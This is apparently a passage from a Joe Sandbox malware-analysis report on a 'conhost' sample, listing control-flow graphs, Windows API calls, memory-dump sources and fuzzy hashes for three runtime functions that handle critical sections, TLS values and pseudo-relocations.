                                                                                                                                control_flow_graph 458 140002104-14000210b 459 140002111-140002128 EnterCriticalSection 458->459 460 140002218-140002221 458->460 461 14000220b-140002212 LeaveCriticalSection 459->461 462 14000212e-14000213c 459->462 463 140002272-140002280 460->463 464 140002223-14000222d 460->464 461->460 467 14000214d-140002159 TlsGetValue GetLastError 462->467 465 140002241-140002263 DeleteCriticalSection 464->465 466 14000222f 464->466 465->463 468 140002230-14000223f 466->468 469 14000215b-14000215e 467->469 470 140002140-140002147 467->470 468->465 469->470 471 140002160-14000216d 469->471 470->461 470->467 471->470
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000028.00000002.4195440790.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                • Associated: 00000028.00000002.4195398685.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000028.00000002.4195481730.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000028.00000002.4195524350.0000000140009000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000028.00000002.4195555772.000000014000A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_40_2_140000000_conhost.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: CriticalSection$DeleteEnterErrorLastLeaveValue
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 926137887-0
                                                                                                                                • Opcode ID: 45aa12ab29fc3c2d0ae3eee0e0c0ab33baf9409f5ce98155d9c2e1cd3bee0986
                                                                                                                                • Instruction ID: 666b5f77822bde30b86d89f839f8ae6682933cabf40eac71bda43f7e294fb4ad
                                                                                                                                • Opcode Fuzzy Hash: 45aa12ab29fc3c2d0ae3eee0e0c0ab33baf9409f5ce98155d9c2e1cd3bee0986
                                                                                                                                • Instruction Fuzzy Hash: B821E0B1715A0292FA5BEB53F9483E923A0B76CBD0F444021FB1E576B4DF7A8986C300
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 474 140001880-14000189c 475 1400018a2-1400018f9 call 140002420 call 140002660 474->475 476 140001a0f-140001a1f 474->476 475->476 481 1400018ff-140001910 475->481 482 140001912-14000191c 481->482 483 14000193e-140001941 481->483 484 14000194d-140001954 482->484 485 14000191e-140001929 482->485 483->484 486 140001943-140001947 483->486 489 140001956-140001961 484->489 490 14000199e-1400019a6 484->490 485->484 487 14000192b-14000193a 485->487 486->484 488 140001a20-140001a26 486->488 487->483 492 140001b87-140001b98 call 140001d40 488->492 493 140001a2c-140001a37 488->493 494 140001970-14000199c call 140001ba0 489->494 490->476 491 1400019a8-1400019c1 490->491 495 1400019df-1400019e7 491->495 493->490 496 140001a3d-140001a5f 493->496 494->490 499 1400019e9-140001a0d VirtualProtect 495->499 500 1400019d0-1400019dd 495->500 501 140001a7d-140001a97 496->501 499->500 500->476 500->495 504 140001b74-140001b82 call 140001d40 501->504 505 140001a9d-140001afa 501->505 504->492 511 140001b22-140001b26 505->511 512 140001afc-140001b0e 505->512 515 140001b2c-140001b30 511->515 516 140001a70-140001a77 511->516 513 140001b5c-140001b6c 512->513 514 140001b10-140001b20 512->514 513->504 518 140001b6f call 140001d40 513->518 514->511 514->513 515->516 517 140001b36-140001b57 call 140001ba0 515->517 516->490 516->501 517->513 518->504
                                                                                                                                APIs
                                                                                                                                • VirtualProtect.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000140001247), ref: 00000001400019F9
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000028.00000002.4195440790.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                • Associated: 00000028.00000002.4195398685.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000028.00000002.4195481730.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000028.00000002.4195524350.0000000140009000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000028.00000002.4195555772.000000014000A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_40_2_140000000_conhost.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ProtectVirtual
                                                                                                                                • String ID: Unknown pseudo relocation bit size %d.$ Unknown pseudo relocation protocol version %d.
                                                                                                                                • API String ID: 544645111-395989641
                                                                                                                                • Opcode ID: a6faf70e8b190511a78e30de1eab31b3fdd89b936d163022cdfacdbb5805c305
                                                                                                                                • Instruction ID: bed1886f8e7b3562c786f91e2c2504e2a336d35a61311b426e06807153cec951
                                                                                                                                • Opcode Fuzzy Hash: a6faf70e8b190511a78e30de1eab31b3fdd89b936d163022cdfacdbb5805c305
                                                                                                                                • Instruction Fuzzy Hash: 415114B6B11544DAEB12CF67F840BE827A1A759BE8F548212FB1D077B4DB38C986C700
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 522 14000219e-1400021a5 523 140002272-140002280 522->523 524 1400021ab-1400021c2 EnterCriticalSection 522->524 525 140002265-14000226c LeaveCriticalSection 524->525 526 1400021c8-1400021d6 524->526 525->523 527 1400021e9-1400021f5 TlsGetValue GetLastError 526->527 528 1400021f7-1400021fa 527->528 529 1400021e0-1400021e7 527->529 528->529 530 1400021fc-140002209 528->530 529->525 529->527 530->529
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000028.00000002.4195440790.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                • Associated: 00000028.00000002.4195398685.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000028.00000002.4195481730.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000028.00000002.4195524350.0000000140009000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000028.00000002.4195555772.000000014000A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_40_2_140000000_conhost.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: CriticalSection$EnterErrorLastLeaveValue
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 682475483-0
                                                                                                                                • Opcode ID: ef714723185b3a8d2aed80037f9450dbdc245cd35eb766ee46406a0163f8cc51
                                                                                                                                • Instruction ID: 8e08899b71d5d6c295770fc95a4fa8b22c720a8a39741bac27afb53efd3d8dea
                                                                                                                                • Opcode Fuzzy Hash: ef714723185b3a8d2aed80037f9450dbdc245cd35eb766ee46406a0163f8cc51
                                                                                                                                • Instruction Fuzzy Hash: C201B2B5705A0192FA5BDB53FE083E86360B76CBD1F454061EF0957AB4DF79C996C200
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%